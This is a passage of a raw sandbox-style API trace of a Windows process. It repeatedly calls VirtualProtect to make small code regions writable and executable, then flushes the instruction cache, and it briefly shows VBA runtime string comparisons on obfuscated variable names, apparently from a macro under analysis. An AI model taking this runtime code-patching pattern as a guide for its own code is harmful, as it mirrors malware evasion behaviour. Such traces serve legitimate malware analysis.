GetCurrentProcess () returned 0xffffffff [0100.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0100.842] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.843] GetCurrentProcess () returned 0xffffffff [0100.843] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0100.843] GetCurrentProcess () returned 0xffffffff [0100.843] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0100.843] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.844] GetCurrentProcess () returned 0xffffffff [0100.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0100.844] GetCurrentProcess () returned 0xffffffff [0100.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0100.844] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.845] GetCurrentProcess () returned 0xffffffff [0100.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0100.845] GetCurrentProcess () returned 0xffffffff [0100.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0100.845] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.846] GetCurrentProcess () returned 0xffffffff [0100.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0100.846] GetCurrentProcess () returned 0xffffffff [0100.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0100.846] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.846] GetCurrentProcess () returned 0xffffffff [0100.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0100.846] GetCurrentProcess () returned 0xffffffff [0100.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0100.847] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.847] GetCurrentProcess () returned 0xffffffff [0100.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0100.847] GetCurrentProcess () returned 0xffffffff [0100.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0100.847] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.848] GetCurrentProcess () returned 0xffffffff [0100.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0100.848] GetCurrentProcess () returned 0xffffffff [0100.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0100.848] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.849] GetCurrentProcess () returned 0xffffffff [0100.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0100.849] GetCurrentProcess () returned 0xffffffff [0100.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0100.849] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.849] GetCurrentProcess () returned 0xffffffff [0100.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0100.849] GetCurrentProcess () returned 0xffffffff [0100.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0100.850] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.850] GetCurrentProcess () returned 0xffffffff [0100.850] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0100.850] GetCurrentProcess () returned 0xffffffff [0100.850] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0100.850] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.851] GetCurrentProcess () returned 0xffffffff [0100.851] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0100.851] GetCurrentProcess () returned 0xffffffff [0100.851] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0100.851] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.852] GetCurrentProcess () returned 0xffffffff [0100.852] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0100.852] GetCurrentProcess () returned 0xffffffff [0100.852] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0100.852] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.852] GetCurrentProcess () returned 0xffffffff [0100.852] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0100.852] GetCurrentProcess () returned 0xffffffff [0100.852] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0100.852] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.853] GetCurrentProcess () returned 0xffffffff [0100.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0100.853] GetCurrentProcess () returned 0xffffffff [0100.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0100.853] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.854] GetCurrentProcess () returned 0xffffffff [0100.854] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0100.854] GetCurrentProcess () returned 0xffffffff [0100.854] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0100.854] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.855] GetCurrentProcess () returned 0xffffffff [0100.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0100.855] GetCurrentProcess () returned 0xffffffff [0100.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0100.855] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.855] GetCurrentProcess () returned 0xffffffff [0100.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0100.855] GetCurrentProcess () returned 0xffffffff [0100.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0100.855] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.856] GetCurrentProcess () returned 0xffffffff [0100.856] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0100.856] GetCurrentProcess () returned 0xffffffff [0100.856] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0100.856] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.857] GetCurrentProcess () returned 0xffffffff [0100.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0100.857] GetCurrentProcess () returned 0xffffffff [0100.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0100.857] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.857] GetCurrentProcess () returned 0xffffffff [0100.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0100.857] GetCurrentProcess () returned 0xffffffff [0100.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0100.858] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.858] GetCurrentProcess () returned 0xffffffff [0100.858] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0100.858] GetCurrentProcess () returned 0xffffffff [0100.858] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0100.858] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.859] GetCurrentProcess () returned 0xffffffff [0100.859] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0100.859] GetCurrentProcess () returned 0xffffffff [0100.859] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0100.859] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.860] GetCurrentProcess () returned 0xffffffff [0100.860] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0100.860] GetCurrentProcess () returned 0xffffffff [0100.860] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0100.860] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.933] GetCurrentProcess () returned 0xffffffff [0100.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0100.935] GetAsyncKeyState (vKey=3) returned 0 [0100.935] GetAsyncKeyState (vKey=3) returned 0 [0100.936] VarCmp (pvarLeft=0x197d98, pvarRight=0x197d88, lcid=0x0, dwFlags=0x30001) returned 0x1 [0100.936] CRetailMalloc_Alloc () returned 0xc9d0598 [0100.936] memcpy (in: _Dst=0xcb65188, _Src=0x197508, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.936] memcpy (in: _Dst=0xcb65290, _Src=0x197524, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.941] memcpy (in: _Dst=0xcb65188, _Src=0x197508, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.941] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97\x97\x97\x96\x97\x96\x97\x97\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96", cchCount2=-1) returned 1 [0100.941] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x96\x97", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96", cchCount2=-1) returned 1 [0100.941] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96", cchCount2=-1) returned 1 [0100.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432dde, cbMultiByte=18, lpWideCharStr=0x197324, cchWideChar=19 | out: lpWideCharStr="——––—––———–—––—––") returned 18 [0100.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2c62, cbMultiByte=18, lpWideCharStr=0x197384, cchWideChar=19 | out: lpWideCharStr="——––—––———–—––—––") returned 18 [0100.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2c62, cbMultiByte=18, lpWideCharStr=0x197384, cchWideChar=19 | out: lpWideCharStr="——––—––———–—––—––") returned 18 [0100.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2c62, cbMultiByte=18, lpWideCharStr=0x197384, cchWideChar=19 | out: lpWideCharStr="——––—––———–—––—––") returned 18 [0100.942] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97\x97\x97\x96\x97\x96\x97\x97\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96", cchCount2=-1) returned 1 [0100.942] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x96\x97", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96", cchCount2=-1) returned 1 [0100.942] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96", cchCount2=-1) returned 1 [0100.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2c62, cbMultiByte=18, lpWideCharStr=0x197384, cchWideChar=19 | out: lpWideCharStr="——––—––———–—––—––") returned 18 [0100.943] CRetailMalloc_Alloc () returned 0xc6d8528 [0100.943] _mbscpy_s (in: _Dst=0xc6d8528, _DstSizeInBytes=0x12, _Src=0x111d2c62 | out: _Dst=0xc6d8528) returned 0x0 [0100.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0b2a, cbMultiByte=25, lpWideCharStr=0x197394, cchWideChar=26 | out: lpWideCharStr="_B_var_——––—––———–—––—––") returned 25 [0100.943] _mbscpy_s (in: _Dst=0x1973fc, _DstSizeInBytes=0x12, _Src=0x111d2c62 | out: _Dst=0x1973fc) returned 0x0 [0100.943] CRetailMalloc_Free () returned 0x1 [0100.943] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.944] memcpy (in: _Dst=0xcb65188, _Src=0x197508, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.944] memcpy (in: _Dst=0xcb65188, _Src=0x197374, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.944] memcpy (in: _Dst=0xcb65188, _Src=0x197374, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.944] CRetailMalloc_Realloc () returned 0xc9d0da8 [0100.944] memcpy (in: _Dst=0xcb65188, _Src=0x197374, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.944] memcpy (in: _Dst=0xcb65188, _Src=0x197508, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.944] memcpy (in: _Dst=0xcb65188, _Src=0x197508, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.944] memcpy (in: _Dst=0xc9d0618, _Src=0x1975a4, _Size=0x18 | out: _Dst=0xc9d0618) returned 0xc9d0618 [0100.945] CRetailMalloc_Realloc () returned 0xc9d0598 [0100.945] CRetailMalloc_Free () returned 0x1 [0100.945] GetCurrentProcess () returned 0xffffffff [0100.945] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0100.945] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.946] GetCurrentProcess () returned 0xffffffff [0100.946] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0100.946] GetCurrentProcess () returned 0xffffffff [0100.946] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0100.946] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.946] GetCurrentProcess () returned 0xffffffff [0100.946] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0100.946] GetCurrentProcess () returned 0xffffffff [0100.946] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0100.946] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.947] GetCurrentProcess () returned 0xffffffff [0100.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0100.947] GetCurrentProcess () returned 0xffffffff [0100.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0100.947] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.947] GetCurrentProcess () returned 0xffffffff [0100.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0100.947] GetCurrentProcess () returned 0xffffffff [0100.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0100.947] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.948] GetCurrentProcess () returned 0xffffffff [0100.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0100.948] GetCurrentProcess () returned 0xffffffff [0100.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0100.948] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.948] GetCurrentProcess () returned 0xffffffff [0100.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0100.948] GetCurrentProcess () returned 0xffffffff [0100.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0100.948] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.949] GetCurrentProcess () returned 0xffffffff [0100.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0100.949] GetCurrentProcess () returned 0xffffffff [0100.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0100.949] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.949] GetCurrentProcess () returned 0xffffffff [0100.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0100.949] GetCurrentProcess () returned 0xffffffff [0100.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0100.949] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.950] GetCurrentProcess () returned 0xffffffff [0100.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0100.950] GetCurrentProcess () returned 0xffffffff [0100.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0100.950] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.950] GetCurrentProcess () returned 0xffffffff [0100.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0100.950] GetCurrentProcess () returned 0xffffffff [0100.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0100.950] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.951] GetCurrentProcess () returned 0xffffffff [0100.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0100.951] GetCurrentProcess () returned 0xffffffff [0100.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0100.951] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.951] GetCurrentProcess () returned 0xffffffff [0100.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0100.951] GetCurrentProcess () returned 0xffffffff [0100.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0100.951] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.952] GetCurrentProcess () returned 0xffffffff [0100.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0100.952] GetCurrentProcess () returned 0xffffffff [0100.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0100.952] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.952] GetCurrentProcess () returned 0xffffffff [0100.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0100.952] GetCurrentProcess () returned 0xffffffff [0100.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0100.952] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.953] GetCurrentProcess () returned 0xffffffff [0100.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0100.953] GetCurrentProcess () returned 0xffffffff [0100.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0100.953] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.953] GetCurrentProcess () returned 0xffffffff [0100.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0100.953] GetCurrentProcess () returned 0xffffffff [0100.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0100.953] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.954] GetCurrentProcess () returned 0xffffffff [0100.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0100.954] GetCurrentProcess () returned 0xffffffff [0100.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0100.954] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.955] GetCurrentProcess () returned 0xffffffff [0100.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0100.955] GetCurrentProcess () returned 0xffffffff [0100.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0100.955] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.955] GetCurrentProcess () returned 0xffffffff [0100.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0100.955] GetCurrentProcess () returned 0xffffffff [0100.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0100.955] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.956] GetCurrentProcess () returned 0xffffffff [0100.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0100.956] GetCurrentProcess () returned 0xffffffff [0100.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0100.956] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.957] GetCurrentProcess () returned 0xffffffff [0100.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0100.957] GetCurrentProcess () returned 0xffffffff [0100.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0100.957] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.958] GetCurrentProcess () returned 0xffffffff [0100.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0100.958] GetCurrentProcess () returned 0xffffffff [0100.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0100.958] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 